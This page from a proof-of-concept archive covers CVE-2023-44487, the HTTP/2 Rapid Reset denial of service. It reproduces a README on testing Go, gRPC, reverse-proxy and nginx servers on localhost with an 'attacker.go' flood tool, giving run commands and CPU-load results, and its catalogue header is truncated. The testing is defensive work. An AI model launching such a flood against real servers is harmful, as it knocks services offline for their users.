POC详情: a0299d4298489418b4eaa9e101bea6eb3edaf800

标题: Apache HTTP/2 资源管理错误漏洞 (CVE-2023-44487)
描述:HTTP/2是超文本传输协议的第二版,主要用于保证客户机与服务器之间的通信。 Apache HTTP/2存在安全漏洞。攻击者利用该漏洞导致系统拒绝服务。以下产品和版本受到影响:.NET 6.0,ASP.NET Core 6.0,.NET 7.0,Microsoft Visual Studio 2022 version 17.2,Microsoft Visual Studio 2022 version 17.4,Microsoft Visual Studio 2022 version 17.6,Micros
# Golang CVE-2023-44487 testing

This repository contains testing resources and results for the CVE-2023-44487.
It uses a modified version of https://github.com/secengjeff/rapidresetclient to test against various Golang server configs.

## Testing against a normal server

go run server.go
go run attacker.go -requests 500000

### Results

**go 1.21.0**
350% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Total time: 7.99 seconds (62562 rps)

**go 1.21.3**
75% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 74767, RST_STREAM = 74767
Total time: 3.57 seconds (20921 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

## Testing against a GRPC server

go run grpcserver.go
go run attacker.go -requests 500000

### Results

**go 1.21.0, golang.org/x/net v0.16.0, google.golang.org/grpc v1.58.0**
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499998
Total time: 10.23 seconds (48898 rps)

**go 1.21.3, golang.org/x/net v0.17.0, google.golang.org/grpc v1.59.0**
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499993
Total time: 8.25 seconds (60639 rps)

> The attacker does not really call GRPC endpoints, so there seems to be no difference in behaviour with "normal" http2 calls.
> Not super sure if this is good or bad, but the server manages to keep up with the traffic.

## Testing against a httputil.ReverseProxy server

# use nginx as target
sudo nginx -c $PWD/nginx/vulnerable_8444.conf -g daemon\ off\;
go run revproxyserver.go
go run attacker.go -requests 500000

### Results

**go 1.21.0**
200% CPU load during the full attack

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 25
Total time: 9.43 seconds (53014 rps)

**go 1.21.3**
150% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 100194, RST_STREAM = 100193
Total time: 4.36 seconds (22955 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

Server log now contains 😎
2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM

## Testing against nginx

sudo nginx -c $PWD/nginx/vulnerable.conf -g daemon\ off\;
go run attacker.go -requests 500000

### Results

**With vulnerable config**

100% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 478609
Total time: 8.13 seconds (61484 rps)

**With default config**
34% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 1432
Total time: 7.62 seconds (65588 rps)

> Nginx just stops to respond to a lot of frames


[4.0K] /data/pocs/a0299d4298489418b4eaa9e101bea6eb3edaf800 ├── [5.3K] attacker.go ├── [4.0K] certs │   ├── [1.2K] server.crt │   └── [1.7K] server.key ├── [ 560] go.mod ├── [1.8K] go.sum ├── [1.5K] grpcserver.go ├── [ 11K] LICENSE ├── [4.0K] nginx │   ├── [ 401] defaults.conf │   ├── [ 69] README.md │   ├── [1.2K] server.crt │   ├── [1.7K] server.key │   ├── [ 540] vulnerable_8443.conf │   └── [ 541] vulnerable_8444.conf ├── [4.0K] proto │   ├── [5.9K] ping.pb.go │   └── [ 242] ping.proto ├── [4.3K] README.md ├── [ 533] revproxyserver.go └── [ 384] server.go 3 directories, 18 files
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